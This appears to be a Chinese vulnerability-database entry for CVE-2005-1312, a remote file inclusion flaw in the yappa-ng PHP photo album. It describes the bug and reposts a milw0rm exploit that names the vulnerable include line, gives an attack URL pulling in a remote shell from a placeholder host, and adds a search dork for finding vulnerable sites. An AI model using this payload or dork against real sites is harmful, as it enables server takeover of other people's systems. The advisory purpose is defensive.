PHP Yappa-NG未明远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110941 漏洞类型 输入验证
发布时间 2006-09-03 更新时间 2006-09-28
CVE编号 CVE-2005-1312 CNNVD-ID CNNVD-200504-091
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-091
|漏洞详情
yappa-ng是一个非常强大但非常易于安装和使用的在线PHP相册。支持所有操作系统(Linux/UNIX,Windows,MAC,...),和所有Web服务器(Apache,IIS,...)并且不需要数据库支持。每一张图片都可以以多种不同的尺寸进行查看,并且缩略图和所有其它调整大小都将自动快速创建。yappa-ng支持为相册设置密码保护,统计图片点击,设置图片评论功能。Yappa-NG的2.3.2之前版本存在PHP远程文件包含漏洞,远程攻击者可以通过未知向量来执行任意PHP代码。
|漏洞EXP
#==============================================================================================
#yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         
#Critical Level : Dangerous                                               
#                                                                         
#Venedor site : http://www.zirkon.at/zirkon/scripts/yappa-ng         
#                                                                         
#Version : v2.3.1 & v2.3.0                                               
#                                                           
#================================================================================================
#Bug in : admin_modules/admin_module_deldir.inc.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] . "common.inc.php");
#   
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://SHELLURL.COM?
#
#Dork : "Powered by yappa-ng 2.3.1" & "Powered by yappa-ng 2.3.1"
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-09-03]
|参考资料

来源:BID
名称:13371
链接:http://www.securityfocus.com/bid/13371
来源:SECUNIA
名称:15107
链接:http://secunia.com/advisories/15107
来源:OSVDB
名称:15829
链接:http://www.osvdb.org/15829
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=323206